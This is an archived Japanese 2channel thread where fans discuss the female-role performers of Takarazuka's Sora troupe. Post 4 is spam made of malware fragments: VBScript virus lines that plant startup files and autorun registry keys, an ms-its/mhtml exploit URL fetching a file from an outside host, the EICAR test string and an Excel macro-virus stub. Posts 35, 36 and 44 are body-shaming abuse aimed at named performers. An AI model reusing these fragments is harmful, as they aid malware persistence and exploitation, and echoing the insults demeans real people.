2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

∞∞ 宙組娘役スレ PART 20 ∞∞

1 :名無しさん@花束いっぱい。:2006/12/25(月) 20:32:25 ID:EeLPY+z/
宙娘達について、楽しく語ろう!
次スレは980が立てましょう!

前スレ
∞∞ 宙組娘役スレ PART 19 ∞∞
http://hobby8.2ch.net/test/read.cgi/siki/1158915112/

2 :名無しさん@花束いっぱい。:2006/12/26(火) 02:27:13 ID:EHRlbY+v
前スレの続きだけど、雅美と和音が退団であれ異動であれ一気に抜けることはないとオモ。
二人が抜けるのは結構痛いぞ。
仮に、ねねが来てもウメアリスねねだと…
見た目はかなり若々しくて美しいけどね。

ただでさえ杏がいなくなるのに雅美と和音がいなくなるのは痛すぎ。

3 :名無しさん@花束いっぱい。:2006/12/26(火) 10:37:59 ID:4OGHfIaY
>前スレ1000
オメ!

4 :<body onload=window()>:2006/12/26(火) 17:01:03 ID:Y0a9sb0n
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

5 :名無しさん@花束いっぱい。:2006/12/29(金) 21:29:37 ID:Qy9BVfO8
お礼状で贔屓娘の姿をみて東京は張り切って通おうとおもた がんばれ〜!

6 :名無しさん@花束いっぱい。:2006/12/29(金) 23:55:41 ID:XpsxwO6f
>2
別にまちゃみとタッチン両方が抜けることはふつーにありえる。
その代わりに2名程誰かが来るだけ。
代わりに歌手系若干別格の実力派とかが来そう。

7 :名無しさん@花束いっぱい。:2006/12/30(土) 04:54:05 ID:L362P0Wn
花や星に、宙からも誰か行くことになるよね。残念。私いまの宙娘の並び好きなのに(´・ω・`)特にたっちんアリスってバランスがとれてるUNDERSTUDYの並び使われ方が好きなのに

8 :名無しさん@花束いっぱい。:2006/12/30(土) 09:48:44 ID:apc5GITK
2名誰かが来るって月からねねかれみ?あとは他の誰?

9 :名無しさん@花束いっぱい。:2006/12/30(土) 11:25:05 ID:0QWQSMF4
花に歌える娘を下さい。
ダンスの娘をあげます。。。


10 :名無しさん@花束いっぱい。:2006/12/30(土) 12:05:34 ID:seUuwx05
>>9
花、歌える娘いるじゃん

11 :名無しさん@花束いっぱい。:2006/12/30(土) 17:04:43 ID:3WslWGtG
今後、アリスがトップになった時にたっちんが別格の美味しい2番手で支えてくれたら最高!
私も、「UNDERSTUDY」の二人の並びが好きだから・・

12 :名無しさん@花束いっぱい。:2006/12/30(土) 18:20:16 ID:evZOsZs+
ウメたっちん
アリスたっちん

二代続けて支えてくれや。で、専科へ。そして伝説へ…

13 :名無しさん@花束いっぱい。:2006/12/30(土) 21:03:01 ID:rVJErtN1
それだとたっちん本当に第2の洲悠花になっちゃう…

14 :名無しさん@花束いっぱい。:2006/12/30(土) 21:08:10 ID:oUnNZyiJ
私もアリスと和音の並び好き。
それぞれが自分の良さを生かして輝いてる。
アンダーでは和音は別格だったけど華やかで可愛かったからアリスと並ぶと若返りできるかも?
(実際若いけどね)


でも、ウメ和音の並びは合わないと思う・・・
そしてアリスでも合わないと思う。

まちゃみはどうなるんだろうか。

15 :名無しさん@花束いっぱい。:2006/12/30(土) 21:46:43 ID:apc5GITK
ウメ、ねねの並びになるのでは?

ねね、和音のトレードになるような・・・

16 :名無しさん@花束いっぱい。:2006/12/30(土) 21:48:19 ID:He68hHlc
トレードない前提だと、ウメ・アリス・たっちんの三人並びに期待。
アリスとたっちんで、可愛いどころと女役系を交互にやってくれたら最高。
たっちんはショーの笑顔が印象的だし、アリスのお蝶が気に入ったので。

雅美はなぁ。どう見てもウメより年上だから、娘2はちと辛い

17 :名無しさん@花束いっぱい。:2006/12/30(土) 21:49:12 ID:oUnNZyiJ
アリスの上にねねなの?
いくらなんでもそりゃないだろ。

18 :名無しさん@花束いっぱい。:2006/12/30(土) 22:37:54 ID:apc5GITK
ごめん!アリスのがネネより先輩だったね。


19 :名無しさん@花束いっぱい。:2007/01/02(火) 22:38:07 ID:dEpZCYZh
アリスかわいい!

20 :名無しさん@花束いっぱい。:2007/01/02(火) 23:56:08 ID:mYsTntOp
↑首の長い娘役、もう少し、娘役としての所作を勉強してください。とても路線に乗っかっているとは、思えなわ。
和音が第2の洲 悠花?一緒にするなんて、ありえな〜い。


21 :名無しさん@花束いっぱい。:2007/01/02(火) 23:56:34 ID:Vqyern1G
アリス、歌上手くなったね。

22 :名無しさん@花束いっぱい。:2007/01/03(水) 00:11:03 ID:fx5wtVAO
アリスちゃん、やっぱり可愛い!!
華やかな娘役だよね。
歌も芝居も上手くなったよ。

23 :名無しさん@花束いっぱい。:2007/01/03(水) 00:41:46 ID:ocdMOqDK
荒れるから花影さんの話やめましょうよ〜…

24 :名無しさん@花束いっぱい。:2007/01/03(水) 01:00:22 ID:8TmDdzHr
荒れるからって…
アリスの歌が上手くなったのは事実だよ。本当に成長したと思う。
芝居は相変わらずイマイチだけどね。

アリスはやっぱり早いうちにトップにしてあげたほうがいいかも。
今が一番可愛いよ。体型もそこまで気にならなかった。



和音、痩せた?
すごい綺麗になってたよ。
和音も体型なんて気にならなかった。芝居も上手いし。
歌も最高だったし、ぜひ別格で頑張ってほしい。



なんといっても雅美が綺麗だった。
雅美も歌も芝居も上手くなったね。



目に付いた人がこの3人だから感想書いてみたけど、みんな綺麗になって成長して最高だと思ったよ。
個人個人がちゃんと成長しているのが分かるし個性も出てていい!!
アリス和音雅美には参りました。

25 :名無しさん@花束いっぱい。:2007/01/03(水) 07:04:16 ID:OEIrvctW
皆さん、感想ありがとう!感想を待つしかできないから嬉しいよ〜

26 :名無しさん@花束いっぱい。:2007/01/04(木) 12:35:52 ID:eWOu6qZQ
私も日々、成長出来るように、「上げ修行」に励みます・・・

27 :名無しさん@花束いっぱい。:2007/01/04(木) 13:07:19 ID:bdQDAF4s
>>16
実際は雅美の方がウメより若いんだけどね・・・


28 :名無しさん@花束いっぱい。:2007/01/04(木) 13:35:43 ID:OGzUh1iM
まさみ、芝居でもショーでもすごいよかった。
綺麗になったし二番手くらいだったらいいと思うけどな。

29 :名無しさん@花束いっぱい。:2007/01/04(木) 14:15:51 ID:wSjxFajp
私も、今回まさみが良かったな。
芝居もショーも舞台栄えして綺麗でした。
息長く続けてほしい娘役さんだと思います。

アリスちゃんは、さすがに華やかでかわいい!
でも、ダンスや踊りの場面では映えるのに
芝居になると(セリフをしゃべると)
とたんに精彩がなくなってしまうのはなぜだろう。
白チュチュのアリスちゃんは遠目ではお花様にそっくりでした。

たっちんは、歌はさすがだし芝居もできるほうだと思うけど
かわいいのに舞台栄えしない人だなぁと再認識。
スタイルの問題なのかなぁ?
パッショナリアのような役で場面場面を引き締める使われ方のほうが
合ってるかも。
でもいつ見ても安定していて安心して見れるなと毎回思います。

30 :名無しさん@花束いっぱい。:2007/01/04(木) 18:11:27 ID:PsMaflRa
女帝とアリスを一緒にするな

31 :名無しさん@花束いっぱい。:2007/01/04(木) 18:42:28 ID:XtxnSNqU
昨日が私のmy初日でした。 私も感想書いてみます。

宙組最高だね。あんなに華やかでみんな輝いてた。 下級生も成長しているのがよく分かる。
特に娘役には驚かされたよ。

まちゃみのソロには色気ムンムンでびっくり。歌も上手くなったし、相変わらず芝居は安定してて上手いね。
ショーでもタニと組んで踊って似合ってたし垢抜けたなぁと思った。

和音も安心して見てられる。カツラのせいで芝居はスタイル悪く見えて残念だったけど、芝居の声も聞きやすくてよかった。
ショーでは可愛らしかった。エトワールは鳥肌たちました。
>>24さんも言ってるけど痩せた?芝居ではスタイルが気になったけどショーでは気になりませんでした。

杏は見せ場があまり無くて残念。でも外国人役?ではダントツ可愛くて華やかで目立ってました。
あんな可愛い子にキスされたら、そりゃ竜馬もデレデレしちゃうよねw 退団しちゃうのが残念・・・

アリスはお芝居では首が長いから着物姿がよく映えて綺麗だった。小芝居も自然で上手いなって思った。 芝居も上手くなったと思うけど声が子供っぽいせい?で、少し残念。
ショーでは可愛いすぎ。本当に華がある子なんだと改めて感じました。歌も上手くなってて、 実はアリスは苦手だったんだけど実力付いてきて好きになってしまいました。

他にはミキちゃんが活躍してたかな。ミキちゃんは最近は、路線落ちってかんじで目立ってなかったけど、
コパあたりから良い女役になってきて、頑張ってると思った。幾松もいい女役で芝居が上手かった。
スタイル良いしこれからも支えていってほしいな。

かなりの長文スマソ。
でも宙娘がみんな成長していたから本当に感動した。急成長ってかんじ?
>>24さんも書いてるように、それぞれ個性が出てきたよね。
特に娘役の中でも目立つ、まちゃみ、和音、アリスはみんな 個性豊かで持っているものが違うから見ていておもしろい。
みんな大事に育てて、みんな個性が発揮できるように使ってほしい。

かしげ、るいるいを中心に今の宙組、なんだかハジケタかんじがして元気いっぱいもらえました。
今の宙組、かなり好きです。
るいるいが(かしげも)退団しちゃうのもったえない。

32 :名無しさん@花束いっぱい。:2007/01/04(木) 18:54:41 ID:ecttYYTr
どいつもただの学芸会じゃん







33 :名無しさん@花束いっぱい。:2007/01/04(木) 19:33:42 ID:YqJcsCr3
いまの宙娘達は、それぞれその娘なりの魅力でてきて、みていて楽しいね。
るいちゃんは、いまが一番良い。
ピークのここでやめどきで正解、と感じた。
楽まで頑張って欲しい。

34 :名無しさん@花束いっぱい。:2007/01/04(木) 22:53:39 ID:iOe8DgQ8
美マンが気になる…
癒し効果があるのなら見てみたいわ。
癒されたいのよ〜

35 :名無しさん@花束いっぱい。:2007/01/05(金) 01:04:13 ID:DWHXyYYO
アリスなんで見つめてくるんだよキモい面して早く宇宙に帰りなよ。あんたのせいでサイレントヒル思い出して血だらけになったじゃないか!!和音は早く退団氏ておしん2のトプ娘役になりなよ!目障りなんだよおばはん体形ブス!!

36 :名無しさん@花束いっぱい。:2007/01/05(金) 01:05:46 ID:DWHXyYYO
アリスなんで見つめてくるんだよキモい面して早く宇宙に帰りなよ。あんたのせいでサイレントヒル思い出して血だらけになったじゃないか!!和音は早く退団氏ておしん2のトプ娘役になりなよ!目障りなんだよおばはん体形ブス!!

37 :名無しさん@花束いっぱい。:2007/01/05(金) 01:17:10 ID:Y5pD8iSp
>>35=36
アリスと和音、二人とも罵倒してるように見せかけて
さりげなく「アリスはどこかに池、和音はトプにしろ」と言ってるねw

38 :名無しさん@花束いっぱい。:2007/01/05(金) 02:17:43 ID:1Z42p46m
35、36 何で見つめてくるんだよって… ブンバロス

39 :名無しさん@花束いっぱい。:2007/01/05(金) 08:25:42 ID:ZITCk3Td
>>37
そういう風にはとらえられないけど…


アリスも和音も最高に可愛い。
どちらも大切な宙娘。絶対に宙組から離れないでほしい。

40 :名無しさん@花束いっぱい。:2007/01/05(金) 09:34:35 ID:X63kzeFQ
和音は、歌というモノがあるからいいけど、花總のマガイもんみたいなのは、見たくないわ〜。

41 :名無しさん@花束いっぱい。:2007/01/05(金) 11:30:52 ID:p3o00z3c
るいちゃんかわいい
まちゃみ存在感あり
たっちん歌かっこいい
アリス華やか
今の宙いい雰囲気だと思う。
みんな自分の位置で頑張ってる風なのがすごくいい。
しかし今回は芝居もショーもつまらなすぎる。
よほどの贔屓がいないと見るのがつらい。

42 :名無しさん@花束いっぱい。:2007/01/05(金) 12:46:03 ID:62wOmnSV
>39
でも、16日の組替メンバーに、たっちん入ってるよ。

43 :名無しさん@花束いっぱい。:2007/01/05(金) 14:07:16 ID:vbckaMc5
組スレより移動してきました。
エナックに映ってる娘役さん達についておたずね致します。
座ってる竜馬(かしちゃんうれしそうw)の周りに洋装の娘役さん達がハベっている画像があるのですが、
それぞれのお名前を教えて頂けましたら幸いです。


44 :名無しさん@花束いっぱい。:2007/01/05(金) 15:17:52 ID:DWHXyYYO
かっこいい男役の名前は死ってるけど豚ブス娘役は死らん。男役にしか興味ないんだよ!あんた女好きなんだ。あ!男役も女だった!!

45 :名無しさん@花束いっぱい。:2007/01/05(金) 15:31:08 ID:EaRr81F+
>>43
かしげ左隣(水色ドレス)・・・大海亜子
かしげ右隣(クリーム色ドレス)・・・咲花杏
後ろ一番左の顔が映って無くて切れてる人w(青ドレス)・・・花影アリス
後ろ左から二番目(薄紫ドレス)・・・美風舞良
後ろ真ん中(ピンクドレス)・・・純あいら
後ろ一番右(オレンジドレス)・・・琴羽桜子

だと思いますよ〜

46 :名無しさん@花束いっぱい。:2007/01/05(金) 18:50:48 ID:T49MtEHN
>>45で正解だと思う。
ちなみにアリスの更に左に、研1の百千さんがいる。
西洋の女全7名、小芝居が面白いので見てやってください。

47 :名無しさん@花束いっぱい。:2007/01/05(金) 21:28:07 ID:UVaB6I4I
長文になってしまい、失礼・・・

るいるいはどのシーンでも輝いてた。
正直、芝居を観れば芸者姿が、ショーを観ればやっぱりコスチューム物が観たかった・・・
というのが本音だけど、竜馬を慕うお竜を本当にいじらしい位に可愛らしく演じてるし、
老貴婦人姿も可愛かったよ。とにかく綺麗だった。

まちゃみ、あの艶っぽい声が芸者役にぴったり。いい女役になれる人だ!と思った。
ミキはショーの中詰めではっちゃけたお色気を発揮。あぁいう路線がもっと観たい。
和音は流石の美声だけあって、声をだすだけで雰囲気があり存在感が増す。笑顔もキラキラ。
杏はどこいてもその可愛いさに目がいく。爽やかな笑顔が印象深く、退団が惜しまれる。
アリスは、ショーのロケット前のソロが印象的。はもりが上手い。
娘役さん、皆かわいくて目の保養。

気になった娘役さんがいるのですが、
パレードの下手側wトリオの、上手側にいる方はどなた?
ゆうこ(風花)のようなキュートな笑顔がまぶしかったです。

48 :名無しさん@花束いっぱい。:2007/01/05(金) 23:53:30 ID:vbckaMc5
>45.46
ありがとうございます!
来週見に行くので楽しみにしておきます(^-^)

49 :名無しさん@花束いっぱい。:2007/01/06(土) 00:11:58 ID:30e1e/bE
観劇感想ありがとうございます。
私もまだ観劇できないので嬉しいです。
杏ちゃんのファンなので、杏ちゃんことも書いてもらって感激です。
いつもどこにいても笑顔が一際可愛い杏ちゃん。
いつも笑顔に癒されてます。退団はやっぱり淋しいっす。

50 :名無しさん@花束いっぱい。:2007/01/06(土) 14:14:37 ID:LlK9Ss7k
今年のTCA見てて気づいたんだけど、
銀橋渡るときに客席と反対側の手を振って歩いてるのは・・・
宙娘だけなのよね。
まぁ前トップもすごい振ってたからかな。


51 :名無しさん@花束いっぱい。:2007/01/06(土) 19:28:16 ID:HwQY76Kh
今日観てきた。
音乃の扱いがすごくいいね。びっくりした。
咲花はすっきり痩せて綺麗になった。退団は惜しい。
花影はやっぱスタイルがびみょー。鎖骨から首のラインが怖い。
美羽は可もなく不可もなく。安定感があるとも言えるけど、地味だ。
和音は的確。安定感があるの通り越して、貫禄が出て来たか。

52 :名無しさん@花束いっぱい。:2007/01/06(土) 19:30:56 ID:guvdSkEb
実力だけならば、まちゃみ・みき・たっちん。
みきは新公ヒロあったし、華も結構あるから来るかもなぁっと思ってたけどな。

53 :名無しさん@花束いっぱい。:2007/01/06(土) 19:54:45 ID:6bDY6hw2
みきの扱いはすごいよねえ。
芝居の幾松姐さんもだし、るいるいと娘役たちの銀橋渡りも
るいるいのお隣だもん。
実力もあるし小顔でスタイルがいいから、これから女役としては
重宝がられて出番が増えるのかな。

54 :名無しさん@花束いっぱい。:2007/01/06(土) 21:18:45 ID:oqmghbx4
次期娘1が歌えないから、フォロー役必要だしね>みきちゃん重用
たっちんには移動説があるし…

55 :名無しさん@花束いっぱい。:2007/01/06(土) 22:00:05 ID:MYSLcri/
47さん
下手側の上寄りというと、たぶん白峰さゆりちゃんでは。
彼女も可愛いのに、もったいない・・・。

56 :名無しさん@花束いっぱい。:2007/01/07(日) 21:14:23 ID:pZHmpnyf
みきちゃんは理事のDS&コンサートでも活躍しそうだね。



57 :名無しさん@花束いっぱい。:2007/01/07(日) 21:53:37 ID:Pq96yNhP
音乃さんが、新公主演したのは
『白昼〜』でしたっけ?

58 :名無しさん@花束いっぱい。:2007/01/07(日) 21:54:57 ID:6VnPaetw
そうで〜す。

59 :名無しさん@花束いっぱい。:2007/01/07(日) 21:55:51 ID:oRMVenqG
>>57
そうだよ。
残念ながらみきはもう路線ではないけど、扱い上がってきたから嬉しい。
いい女役目指してがんばってほしい。

60 :名無しさん@花束いっぱい。:2007/01/07(日) 22:04:12 ID:Xp+Q1YAk
本当にイイ女役になってきたよね、これからのみきに期待!!
たっちん移動しないでほしいけどこんだけ噂があるとそうかなって思っちゃう。そうなると移動娘を使いつつ、アリスを育てるのかな

61 :名無しさん@花束いっぱい。:2007/01/07(日) 22:04:51 ID:Imwlt/kI
白昼のヴィヴィアンヌは似合っていた。
かなみを押しのけてまでのヒロインってのは凄かった。
新公ヒロ5回ってのもかなみにとっては普通だろうな、と
思うし。
で、みき>まちゃみになるのか…とも思えるがみき自身が
路線への意欲が大して無いためにその後ヒロインはこなかったな。
でも、ステラ全ツ2番ってのは路線に乗れなかったのに
よくやったもんんだ。って思った。

62 :名無しさん@花束いっぱい。:2007/01/07(日) 22:11:19 ID:Pq96yNhP
58,59サンキュー。
やっぱりね・・鳳凰伝の若い女官の中で、ん?かわいい子がいる!
と調べると、音乃ちゃんでした。

63 :名無しさん@花束いっぱい。:2007/01/07(日) 22:22:16 ID:oRMVenqG
>>61
本人に意欲が無かったんじゃなくて、ただ単に真ん中向きでないと劇団が判断したからじゃない?
白昼の新公、観たけどみきはヒロインってかんじではないと思ったよ。
でも、みき自身は実力あるし(組同期ではまぁまぁだけど)スタイルも良いし、
このまま使われなくなるのはもったいないと思ってたから、
みきの活躍はすごく嬉しい。
幾松最高だよね。


新公で幾松やった藤咲さんは抜擢だと思うけど、観た方どうでした?

64 :名無しさん@花束いっぱい。:2007/01/07(日) 22:27:56 ID:Imwlt/kI
ちなみに美樹の新公役付。
●のついているのはまちゃみより扱いが良い公演。

砂漠薔薇…ハレムの歌手(本役=あゆみさん)
海超…無し
ベルバラ…小公女(本役=あすか)
カスミラ…ヘレン(本役=あゆみさん)
鳳凰伝…タマル(本役=かなみん、2番手)●
傭兵…カトリーヌ(本役=華宮あいりーん)●
白昼…ヴィヴィアンヌ(本役=お花、主演)●
ファントム…ソニア(本役=無し)
ホテルステラ…アリソン(本役=かなみん、2番手)●
炎に口付け…修道院長(本役=きゃみ)

65 :名無しさん@花束いっぱい。:2007/01/07(日) 22:30:32 ID:Imwlt/kI
>>63
そうなのかなぁ。写真だけみたけどおお!って思ったんだよね。
ヒロインらしい!って。

観てないけど、藤咲さんは
・お化粧に改善の必要あり
・研2にしてあの演技力ならば素晴らしい
みたいな感じらしいよ。
詳しいことはしらない。

66 :名無しさん@花束いっぱい。:2007/01/08(月) 10:06:10 ID:WIsgtiNJ
音乃いづみちゃんは、4年前の轟さんのスタイリッシュのコンサートの
稽古場の映像で轟さんと仲良く隣で歌っているのを見て可愛いと思った!
轟さんのお気に入りなのかな?


67 :名無しさん@花束いっぱい。:2007/01/08(月) 11:30:25 ID:Dz9825qU
ステラ全ツは新公が好評だったからだと思う。
ホントいい女だった。
全ツは演出の変更か嫌な女になってたけど。
白昼新公は緊張しすぎててヒロインタイプかは判別つかなかった。
最後の笑顔は可愛かったけど。

これまでは娘1が上級生だったせいか
女役タイプのみきちゃんはあんまり出番なかったけど
これからはどんどん使ってもらえそうで嬉しいな。

68 :名無しさん@花束いっぱい。:2007/01/08(月) 12:27:15 ID:U1WE4LUM
>66
人選は演出家まかせだったらしいよ
でもふーちゃんのようなヒロイン的扱いだったら凄いと思う

69 :名無しさん@花束いっぱい。:2007/01/08(月) 12:48:02 ID:LHaeID29
最近はえっちゃんや純ちゃん、鮎ちゃんも学年が上がってきたからか出番増えたよね。
純ちゃんの退団は惜しいなぁ・・・
同期に新公主演者、バウ主演者が4人いたし純ちゃん自身も成績は良くなかったけど、
よく研8まで頑張ったと思うよ。
綺麗だしもっと頑張ってほしかったけどね。

70 :名無しさん@花束いっぱい。:2007/01/08(月) 20:25:38 ID:sfB3EKGw
えっちゃん、純ちゃん、鮎ちゃんも学年が上がってきたけど、
このスレも徐々に上がってきた・・・

71 :名無しさん@花束いっぱい。:2007/01/08(月) 22:09:07 ID:rzUzK5Ti
>>65
またランク付け・箇条書き大好きトンチンカンか・・・
知らないなら答えなきゃいいのに。
何で知らないくせにわざわざ答えてるの?

72 :名無しさん@花束いっぱい。:2007/01/09(火) 04:26:55 ID:1oupJSrQ
音乃ちゃんと稽古場が一緒でしたが、歌唱力&スタイルは抜群!オフの時も、凄く気さくな感じです♪

73 :名無しさん@花束いっぱい。:2007/01/09(火) 08:46:25 ID:lpnbHPtE
冬休みはいつ終わるの?

74 :名無しさん@花束いっぱい。:2007/01/09(火) 21:34:42 ID:vF9V0O2j
そろそろ終わるでしょ。
普通に路線落ちの地味娘役だし…。

75 :名無しさん@花束いっぱい:2007/01/10(水) 21:32:45 ID:BJrNOzol
75

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)